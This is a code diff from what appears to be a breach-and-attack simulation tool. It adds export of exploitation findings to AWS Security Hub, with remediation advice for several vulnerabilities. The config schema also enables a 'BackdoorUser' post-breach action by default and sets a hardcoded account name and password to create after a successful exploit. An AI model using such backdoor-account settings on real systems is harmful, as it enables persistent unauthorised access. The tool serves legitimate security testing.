||||
from cc.resources.exporter import Exporter
|
||||
from cc.services.config import ConfigService
|
||||
from cc.environment.environment import load_server_configuration_from_file
|
||||
from common.cloud.aws import AWS
|
||||
|
||||
__author__ = 'maor.rayzin'
|
||||
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
AWS_CRED_CONFIG_KEYS = [['cnc', 'aws_config', 'aws_access_key_id'],
|
||||
['cnc', 'aws_config', 'aws_secret_access_key'],
|
||||
['cnc', 'aws_config', 'aws_account_id']]
|
||||
|
||||
|
||||
class AWSExporter(Exporter):
|
||||
|
||||
@staticmethod
|
||||
def handle_report(report_json):
|
||||
aws = AWS()
|
||||
findings_list = []
|
||||
issues_list = report_json['recommendations']['issues']
|
||||
if not issues_list:
|
||||
logger.info('No issues were found by the monkey, no need to send anything')
|
||||
return True
|
||||
for machine in issues_list:
|
||||
for issue in issues_list[machine]:
|
||||
if issue.get('aws_instance_id', None):
|
||||
findings_list.append(AWSExporter._prepare_finding(issue, aws.get_region()))
|
||||
|
||||
if not AWSExporter._send_findings(findings_list, AWSExporter._get_aws_keys(), aws.get_region()):
|
||||
logger.error('Exporting findings to aws failed')
|
||||
return False
|
||||
|
||||
return True
|
||||
|
||||
@staticmethod
|
||||
def _get_aws_keys():
|
||||
creds_dict = {}
|
||||
for key in AWS_CRED_CONFIG_KEYS:
|
||||
creds_dict[key[2]] = str(ConfigService.get_config_value(key))
|
||||
|
||||
return creds_dict
|
||||
|
||||
@staticmethod
|
||||
def merge_two_dicts(x, y):
|
||||
z = x.copy() # start with x's keys and values
|
||||
z.update(y) # modifies z with y's keys and values & returns None
|
||||
return z
|
||||
|
||||
@staticmethod
|
||||
def _prepare_finding(issue, region):
|
||||
findings_dict = {
|
||||
'island_cross_segment': AWSExporter._handle_island_cross_segment_issue,
|
||||
'ssh': AWSExporter._handle_ssh_issue,
|
||||
'shellshock': AWSExporter._handle_shellshock_issue,
|
||||
'tunnel': AWSExporter._handle_tunnel_issue,
|
||||
'elastic': AWSExporter._handle_elastic_issue,
|
||||
'smb_password': AWSExporter._handle_smb_password_issue,
|
||||
'smb_pth': AWSExporter._handle_smb_pth_issue,
|
||||
'sambacry': AWSExporter._handle_sambacry_issue,
|
||||
'shared_passwords': AWSExporter._handle_shared_passwords_issue,
|
||||
'wmi_password': AWSExporter._handle_wmi_password_issue,
|
||||
'wmi_pth': AWSExporter._handle_wmi_pth_issue,
|
||||
'ssh_key': AWSExporter._handle_ssh_key_issue,
|
||||
'rdp': AWSExporter._handle_rdp_issue,
|
||||
'shared_passwords_domain': AWSExporter._handle_shared_passwords_domain_issue,
|
||||
'shared_admins_domain': AWSExporter._handle_shared_admins_domain_issue,
|
||||
'strong_users_on_crit': AWSExporter._handle_strong_users_on_crit_issue,
|
||||
'struts2': AWSExporter._handle_struts2_issue,
|
||||
'weblogic': AWSExporter._handle_weblogic_issue,
|
||||
'hadoop': AWSExporter._handle_hadoop_issue,
|
||||
# azure and conficker are not relevant issues for an AWS env
|
||||
}
|
||||
|
||||
configured_product_arn = load_server_configuration_from_file()['aws'].get('sec_hub_product_arn', '')
|
||||
product_arn = 'arn:aws:securityhub:{region}:{arn}'.format(region=region, arn=configured_product_arn)
|
||||
instance_arn = 'arn:aws:ec2:' + str(region) + ':instance:{instance_id}'
|
||||
account_id = AWSExporter._get_aws_keys().get('aws_account_id', '')
|
||||
|
||||
finding = {
|
||||
"SchemaVersion": "2018-10-08",
|
||||
"Id": uuid.uuid4().hex,
|
||||
"ProductArn": product_arn,
|
||||
"GeneratorId": issue['type'],
|
||||
"AwsAccountId": account_id,
|
||||
"RecordState": "ACTIVE",
|
||||
"Types": [
|
||||
"Software and Configuration Checks/Vulnerabilities/CVE"
|
||||
],
|
||||
"CreatedAt": datetime.now().isoformat() + 'Z',
|
||||
"UpdatedAt": datetime.now().isoformat() + 'Z',
|
||||
}
|
||||
return AWSExporter.merge_two_dicts(finding, findings_dict[issue['type']](issue, instance_arn))
|
||||
|
||||
@staticmethod
|
||||
def _send_findings(findings_list, creds_dict, region):
|
||||
try:
|
||||
if not creds_dict:
|
||||
logger.info('No AWS access credentials received in configuration')
|
||||
return False
|
||||
|
||||
securityhub = boto3.client('securityhub',
|
||||
aws_access_key_id=creds_dict.get('aws_access_key_id', ''),
|
||||
aws_secret_access_key=creds_dict.get('aws_secret_access_key', ''),
|
||||
region_name=region)
|
||||
|
||||
import_response = securityhub.batch_import_findings(Findings=findings_list)
|
||||
if import_response['ResponseMetadata']['HTTPStatusCode'] == 200:
|
||||
return True
|
||||
else:
|
||||
return False
|
||||
except UnknownServiceError as e:
|
||||
logger.warning('AWS exporter called but AWS-CLI securityhub service is not installed')
|
||||
return False
|
||||
except Exception as e:
|
||||
logger.exception('AWS security hub findings failed to send.')
|
||||
return False
|
||||
|
||||
@staticmethod
|
||||
def _get_finding_resource(instance_id, instance_arn):
|
||||
if instance_id:
|
||||
return [{
|
||||
"Type": "AwsEc2Instance",
|
||||
"Id": instance_arn.format(instance_id=instance_id)
|
||||
}]
|
||||
else:
|
||||
return [{'Type': 'Other', 'Id': 'None'}]
|
||||
|
||||
@staticmethod
|
||||
def _build_generic_finding(severity, title, description, recommendation, instance_arn, instance_id=None):
|
||||
finding = {
|
||||
"Severity": {
|
||||
"Product": severity,
|
||||
"Normalized": 100
|
||||
},
|
||||
'Resources': AWSExporter._get_finding_resource(instance_id, instance_arn),
|
||||
"Title": title,
|
||||
"Description": description,
|
||||
"Remediation": {
|
||||
"Recommendation": {
|
||||
"Text": recommendation
|
||||
}
|
||||
}}
|
||||
|
||||
return finding
|
||||
|
||||
@staticmethod
|
||||
def _handle_tunnel_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=5,
|
||||
title="Weak segmentation - Machines were able to communicate over unused ports.",
|
||||
description="Use micro-segmentation policies to disable communication other than the required.",
|
||||
recommendation="Machines are not locked down at port level. Network tunnel was set up from {0} to {1}"
|
||||
.format(issue['machine'], issue['dest']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_sambacry_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Samba servers are vulnerable to 'SambaCry'",
|
||||
description="Change {0} password to a complex one-use password that is not shared with other computers on the network. Update your Samba server to 4.4.14 and up, 4.5.10 and up, or 4.6.4 and up." \
|
||||
.format(issue['username']),
|
||||
recommendation="The machine {0} ({1}) is vulnerable to a SambaCry attack. The Monkey authenticated over the SMB protocol with user {2} and its password, and used the SambaCry vulnerability.".format(
|
||||
issue['machine'], issue['ip_address'], issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_smb_pth_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=5,
|
||||
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||
issue['username']),
|
||||
recommendation="The machine {0}({1}) is vulnerable to a SMB attack. The Monkey used a pass-the-hash attack over SMB protocol with user {2}.".format(
|
||||
issue['machine'], issue['ip_address'], issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_ssh_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||
issue['username']),
|
||||
recommendation="The machine {0} ({1}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with user {2} and its password.".format(
|
||||
issue['machine'], issue['ip_address'], issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_ssh_key_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using SSH passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Protect {ssh_key} private key with a pass phrase.".format(ssh_key=issue['ssh_key']),
|
||||
recommendation="The machine {machine} ({ip_address}) is vulnerable to a SSH attack. The Monkey authenticated over the SSH protocol with private key {ssh_key}.".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address'], ssh_key=issue['ssh_key']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_elastic_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Elastic Search servers are vulnerable to CVE-2015-1427",
|
||||
description="Update your Elastic Search server to version 1.4.3 and up.",
|
||||
recommendation="The machine {0}({1}) is vulnerable to an Elastic Groovy attack. The attack was made possible because the Elastic Search server was not patched against CVE-2015-1427.".format(
|
||||
issue['machine'], issue['ip_address']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_island_cross_segment_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Weak segmentation - Machines from different segments are able to communicate.",
|
||||
description="Segment your network and make sure there is no communication between machines from different segments.",
|
||||
recommendation="The network can probably be segmented. A monkey instance on \
|
||||
{0} in the networks {1} \
|
||||
could directly access the Monkey Island server in the networks {2}.".format(issue['machine'],
|
||||
issue['networks'],
|
||||
issue['server_networks']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_shared_passwords_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Multiple users have the same password",
|
||||
description="Some users are sharing passwords, this should be fixed by changing passwords.",
|
||||
recommendation="These users are sharing access password: {0}.".format(issue['shared_with']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_shellshock_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Machines are vulnerable to 'Shellshock'",
|
||||
description="Update your Bash to a ShellShock-patched version.",
|
||||
recommendation="The machine {0} ({1}) is vulnerable to a ShellShock attack. "
|
||||
"The attack was made possible because the HTTP server running on TCP port {2} was vulnerable to a shell injection attack on the paths: {3}.".format(
|
||||
issue['machine'], issue['ip_address'], issue['port'], issue['paths']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_smb_password_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||
issue['username']),
|
||||
recommendation="The machine {0} ({1}) is vulnerable to a SMB attack. The Monkey authenticated over the SMB protocol with user {2} and its password.".format(
|
||||
issue['machine'], issue['ip_address'], issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_wmi_password_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.",
|
||||
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey authenticated over the WMI protocol with user {username} and its password.".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_wmi_pth_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||
issue['username']),
|
||||
recommendation="The machine machine ({ip_address}) is vulnerable to a WMI attack. The Monkey used a pass-the-hash attack over WMI protocol with user {username}".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_rdp_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Machines are accessible using passwords supplied by the user during the Monkey's configuration.",
|
||||
description="Change {0}'s password to a complex one-use password that is not shared with other computers on the network.".format(
|
||||
issue['username']),
|
||||
recommendation="The machine machine ({ip_address}) is vulnerable to a RDP attack. The Monkey authenticated over the RDP protocol with user {username} and its password.".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address'], username=issue['username']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_shared_passwords_domain_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Multiple users have the same password.",
|
||||
description="Some domain users are sharing passwords, this should be fixed by changing passwords.",
|
||||
recommendation="These users are sharing access password: {shared_with}.".format(
|
||||
shared_with=issue['shared_with']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_shared_admins_domain_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Shared local administrator account - Different machines have the same account as a local administrator.",
|
||||
description="Make sure the right administrator accounts are managing the right machines, and that there isn\'t an unintentional local admin sharing.",
|
||||
recommendation="Here is a list of machines which the account {username} is defined as an administrator: {shared_machines}".format(
|
||||
username=issue['username'], shared_machines=issue['shared_machines']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_strong_users_on_crit_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=1,
|
||||
title="Mimikatz found login credentials of a user who has admin access to a server defined as critical.",
|
||||
description="This critical machine is open to attacks via strong users with access to it.",
|
||||
recommendation="The services: {services} have been found on the machine thus classifying it as a critical machine. These users has access to it:{threatening_users}.".format(
|
||||
services=issue['services'], threatening_users=issue['threatening_users']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_struts2_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Struts2 servers are vulnerable to remote code execution.",
|
||||
description="Upgrade Struts2 to version 2.3.32 or 2.5.10.1 or any later versions.",
|
||||
recommendation="Struts2 server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||
" The attack was made possible because the server is using an old version of Jakarta based file upload Multipart parser.".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_weblogic_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Oracle WebLogic servers are vulnerable to remote code execution.",
|
||||
description="Install Oracle critical patch updates. Or update to the latest version. " \
|
||||
"Vulnerable versions are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.",
|
||||
recommendation="Oracle WebLogic server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||
" The attack was made possible due to incorrect permission assignment in Oracle Fusion Middleware (subcomponent: WLS Security).".format(
|
||||
machine=issue['machine'], ip_address=issue['ip_address']),
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
||||
|
||||
@staticmethod
|
||||
def _handle_hadoop_issue(issue, instance_arn):
|
||||
|
||||
return AWSExporter._build_generic_finding(
|
||||
severity=10,
|
||||
title="Hadoop/Yarn servers are vulnerable to remote code execution.",
|
||||
description="Run Hadoop in secure mode, add Kerberos authentication.",
|
||||
recommendation="The Hadoop server at {machine} ({ip_address}) is vulnerable to remote code execution attack."
|
||||
"The attack was made possible due to default Hadoop/Yarn configuration being insecure.",
|
||||
instance_arn=instance_arn,
|
||||
instance_id=issue['aws_instance_id'] if 'aws_instance_id' in issue else None
|
||||
)
|
|
@ -0,0 +1,7 @@
|
|||
class Exporter(object):
|
||||
def __init__(self):
|
||||
pass
|
||||
|
||||
@staticmethod
|
||||
def handle_report(report_json):
|
||||
raise NotImplementedError
|
|
@ -0,0 +1,24 @@
|
|||
import json
|
||||
|
||||
import flask_restful
|
||||
from flask import request, jsonify, abort
|
||||
|
||||
from cc.auth import jwt_required
|
||||
from cc.services.config import ConfigService
|
||||
|
||||
|
||||
class IslandConfiguration(flask_restful.Resource):
|
||||
@jwt_required()
|
||||
def get(self):
|
||||
return jsonify(schema=ConfigService.get_config_schema(),
|
||||
configuration=ConfigService.get_config(False, True, True))
|
||||
|
||||
@jwt_required()
|
||||
def post(self):
|
||||
config_json = json.loads(request.data)
|
||||
if 'reset' in config_json:
|
||||
ConfigService.reset_config()
|
||||
else:
|
||||
if not ConfigService.update_config(config_json, should_encrypt=True):
|
||||
abort(400)
|
||||
return self.get()
|
|
@ -65,5 +65,7 @@ class Root(flask_restful.Resource):
|
|||
if not infection_done:
|
||||
report_done = False
|
||||
else:
|
||||
if is_any_exists:
|
||||
ReportService.get_report()
|
||||
report_done = ReportService.is_report_generated()
|
||||
return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)
|
||||
|
|
|
@ -191,6 +191,10 @@ class Telemetry(flask_restful.Resource):
|
|||
if 'wmi' in telemetry_json['data']:
|
||||
wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
|
||||
wmi_handler.process_and_handle_wmi_info()
|
||||
if 'aws' in telemetry_json['data']:
|
||||
if 'instance_id' in telemetry_json['data']['aws']:
|
||||
mongo.db.monkey.update_one({'_id': monkey_id},
|
||||
{'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})
|
||||
|
||||
@staticmethod
|
||||
def add_ip_to_ssh_keys(ip, ssh_info):
|
||||
|
|
|
@ -27,7 +27,9 @@ ENCRYPTED_CONFIG_ARRAYS = \
|
|||
# This should be used for config values of string type
|
||||
ENCRYPTED_CONFIG_STRINGS = \
|
||||
[
|
||||
|
||||
['cnc', 'aws_config', 'aws_access_key_id'],
|
||||
['cnc', 'aws_config', 'aws_account_id'],
|
||||
['cnc', 'aws_config', 'aws_secret_access_key']
|
||||
]
|
||||
|
||||
|
||||
|
@ -38,11 +40,12 @@ class ConfigService:
|
|||
pass
|
||||
|
||||
@staticmethod
|
||||
def get_config(is_initial_config=False, should_decrypt=True):
|
||||
def get_config(is_initial_config=False, should_decrypt=True, is_island=False):
|
||||
"""
|
||||
Gets the entire global config.
|
||||
:param is_initial_config: If True, the initial config will be returned instead of the current config.
|
||||
:param should_decrypt: If True, all config values which are set as encrypted will be decrypted.
|
||||
:param is_island: If True, will include island specific configuration parameters.
|
||||
:return: The entire global config.
|
||||
"""
|
||||
config = mongo.db.config.find_one({'name': 'initial' if is_initial_config else 'newconfig'}) or {}
|
||||
|
@ -50,6 +53,8 @@ class ConfigService:
|
|||
config.pop(field, None)
|
||||
if should_decrypt and len(config) > 0:
|
||||
ConfigService.decrypt_config(config)
|
||||
if not is_island:
|
||||
config.get('cnc', {}).pop('aws_config', None)
|
||||
return config
|
||||
|
||||
@staticmethod
|
||||
|
@ -223,11 +228,15 @@ class ConfigService:
|
|||
ConfigService._encrypt_or_decrypt_config(config, False)
|
||||
|
||||
@staticmethod
|
||||
def decrypt_flat_config(flat_config):
|
||||
def decrypt_flat_config(flat_config, is_island=False):
|
||||
"""
|
||||
Same as decrypt_config but for a flat configuration
|
||||
"""
|
||||
keys = [config_arr_as_array[2] for config_arr_as_array in (ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
|
||||
if is_island:
|
||||
keys = [config_arr_as_array[2] for config_arr_as_array in
|
||||
(ENCRYPTED_CONFIG_ARRAYS + ENCRYPTED_CONFIG_STRINGS)]
|
||||
else:
|
||||
keys = [config_arr_as_array[2] for config_arr_as_array in ENCRYPTED_CONFIG_ARRAYS]
|
||||
for key in keys:
|
||||
if isinstance(flat_config[key], collections.Sequence) and not isinstance(flat_config[key], string_types):
|
||||
# Check if we are decrypting ssh key pair
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
WARNING_SIGN = u" \u26A0"
|
||||
|
||||
|
||||
SCHEMA = {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
|
@ -23,6 +22,13 @@ SCHEMA = {
|
|||
],
|
||||
"title": "WMI Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MSSQLExploiter"
|
||||
],
|
||||
"title": "MSSQL Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
|
@ -88,6 +94,19 @@ SCHEMA = {
|
|||
}
|
||||
]
|
||||
},
|
||||
"post_breach_acts": {
|
||||
"title": "Post breach actions",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"BackdoorUser"
|
||||
],
|
||||
"title": "Back door user",
|
||||
},
|
||||
],
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint class",
|
||||
"type": "string",
|
||||
|
@ -276,7 +295,19 @@ SCHEMA = {
|
|||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Is the monkey alive"
|
||||
}
|
||||
},
|
||||
"post_breach_actions": {
|
||||
"title": "Post breach actions",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/post_breach_acts"
|
||||
},
|
||||
"default": [
|
||||
"BackdoorUser",
|
||||
],
|
||||
"description": "List of actions the Monkey will run post breach"
|
||||
},
|
||||
}
|
||||
},
|
||||
"behaviour": {
|
||||
|
@ -612,6 +643,31 @@ SCHEMA = {
|
|||
"description": "The current command server the monkey is communicating with"
|
||||
}
|
||||
}
|
||||
},
|
||||
'aws_config': {
|
||||
'title': 'AWS Configuration',
|
||||
'type': 'object',
|
||||
'description': 'These credentials will be used in order to export the monkey\'s findings to the AWS Security Hub.',
|
||||
'properties': {
|
||||
'aws_account_id': {
|
||||
'title': 'AWS account ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS account ID that is subscribed to security hub feeds',
|
||||
'default': ''
|
||||
},
|
||||
'aws_access_key_id': {
|
||||
'title': 'AWS access key ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS public access key ID, can be found in the IAM user interface in the AWS console.',
|
||||
'default': ''
|
||||
},
|
||||
'aws_secret_access_key': {
|
||||
'title': 'AWS secret access key',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS secret access key id, you can get this after creating a public access key in the console.',
|
||||
'default': ''
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
|
@ -633,6 +689,7 @@ SCHEMA = {
|
|||
"default": [
|
||||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"MSSQLExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"SambaCryExploiter",
|
||||
|
@ -664,14 +721,14 @@ SCHEMA = {
|
|||
"default": 5,
|
||||
"description": "Number of attempts to exploit using MS08_067"
|
||||
},
|
||||
"ms08_067_remote_user_add": {
|
||||
"title": "MS08_067 remote user",
|
||||
"user_to_add": {
|
||||
"title": "Remote user",
|
||||
"type": "string",
|
||||
"default": "Monkey_IUSER_SUPPORT",
|
||||
"description": "Username to add on successful exploit"
|
||||
},
|
||||
"ms08_067_remote_user_pass": {
|
||||
"title": "MS08_067 remote user password",
|
||||
"remote_user_pass": {
|
||||
"title": "Remote user password",
|
||||
"type": "string",
|
||||
"default": "Password1!",
|
||||
"description": "Password to use for created user"
|
||||
|
@ -805,7 +862,7 @@ SCHEMA = {
|
|||
"tcp_scan_interval": {
|
||||
"title": "TCP scan interval",
|
||||
"type": "integer",
|
||||
"default": 200,
|
||||
"default": 0,
|
||||
"description": "Time to sleep (in milliseconds) between scans"
|
||||
},
|
||||
"tcp_scan_timeout": {
|
||||
|
|
|
@ -294,6 +294,10 @@ class NodeService:
|
|||
def is_monkey_finished_running():
|
||||
return NodeService.is_any_monkey_exists() and not NodeService.is_any_monkey_alive()
|
||||
|
||||
@staticmethod
|
||||
def get_latest_modified_monkey():
|
||||
return mongo.db.monkey.find({}).sort('modifytime', -1).limit(1)
|
||||
|
||||
@staticmethod
|
||||
def add_credentials_to_monkey(monkey_id, creds):
|
||||
mongo.db.monkey.update(
|
||||
|
|
|
@ -3,11 +3,14 @@ import functools
|
|||
|
||||
import ipaddress
|
||||
import logging
|
||||
|
||||
from bson import json_util
|
||||
from enum import Enum
|
||||
|
||||
from six import text_type
|
||||
|
||||
from cc.database import mongo
|
||||
from cc.report_exporter_manager import ReportExporterManager
|
||||
from cc.services.config import ConfigService
|
||||
from cc.services.edge import EdgeService
|
||||
from cc.services.node import NodeService
|
||||
|
@ -37,7 +40,8 @@ class ReportService:
|
|||
'ShellShockExploiter': 'ShellShock Exploiter',
|
||||
'Struts2Exploiter': 'Struts2 Exploiter',
|
||||
'WebLogicExploiter': 'Oracle WebLogic Exploiter',
|
||||
'HadoopExploiter': 'Hadoop/Yarn Exploiter'
|
||||
'HadoopExploiter': 'Hadoop/Yarn Exploiter',
|
||||
'MSSQLExploiter': 'MSSQL Exploiter'
|
||||
}
|
||||
|
||||
class ISSUES_DICT(Enum):
|
||||
|
@ -52,7 +56,8 @@ class ReportService:
|
|||
STRUTS2 = 8
|
||||
WEBLOGIC = 9
|
||||
HADOOP = 10
|
||||
PTH_CRIT_SERVICES_ACCESS = 11
|
||||
PTH_CRIT_SERVICES_ACCESS = 11,
|
||||
MSSQL = 12
|
||||
|
||||
class WARNINGS_DICT(Enum):
|
||||
CROSS_SEGMENT = 0
|
||||
|
@ -123,9 +128,9 @@ class ReportService:
|
|||
'label': node['label'],
|
||||
'ip_addresses': node['ip_addresses'],
|
||||
'accessible_from_nodes':
|
||||
(x['hostname'] for x in
|
||||
list((x['hostname'] for x in
|
||||
(NodeService.get_displayed_node_by_id(edge['from'], True)
|
||||
for edge in EdgeService.get_displayed_edges_by_to(node['id'], True))),
|
||||
for edge in EdgeService.get_displayed_edges_by_to(node['id'], True)))),
|
||||
'services': node['services']
|
||||
})
|
||||
|
||||
|
@ -326,6 +331,12 @@ class ReportService:
|
|||
processed_exploit['type'] = 'hadoop'
|
||||
return processed_exploit
|
||||
|
||||
@staticmethod
|
||||
def process_mssql_exploit(exploit):
|
||||
processed_exploit = ReportService.process_general_exploit(exploit)
|
||||
processed_exploit['type'] = 'mssql'
|
||||
return processed_exploit
|
||||
|
||||
@staticmethod
|
||||
def process_exploit(exploit):
|
||||
exploiter_type = exploit['data']['exploiter']
|
||||
|
@ -340,7 +351,8 @@ class ReportService:
|
|||
'ShellShockExploiter': ReportService.process_shellshock_exploit,
|
||||
'Struts2Exploiter': ReportService.process_struts2_exploit,
|
||||
'WebLogicExploiter': ReportService.process_weblogic_exploit,
|
||||
'HadoopExploiter': ReportService.process_hadoop_exploit
|
||||
'HadoopExploiter': ReportService.process_hadoop_exploit,
|
||||
'MSSQLExploiter': ReportService.process_mssql_exploit
|
||||
}
|
||||
|
||||
return EXPLOIT_PROCESS_FUNCTION_DICT[exploiter_type](exploit)
|
||||
|
@ -540,12 +552,24 @@ class ReportService:
|
|||
for issue in issues:
|
||||
if not issue.get('is_local', True):
|
||||
machine = issue.get('machine').upper()
|
||||
aws_instance_id = ReportService.get_machine_aws_instance_id(issue.get('machine'))
|
||||
if machine not in domain_issues_dict:
|
||||
domain_issues_dict[machine] = []
|
||||
if aws_instance_id:
|
||||
issue['aws_instance_id'] = aws_instance_id
|
||||
domain_issues_dict[machine].append(issue)
|
||||
logger.info('Domain issues generated for reporting')
|
||||
return domain_issues_dict
|
||||
|
||||
@staticmethod
|
||||
def get_machine_aws_instance_id(hostname):
|
||||
aws_instance_id_list = list(mongo.db.monkey.find({'hostname': hostname}, {'aws_instance_id': 1}))
|
||||
if aws_instance_id_list:
|
||||
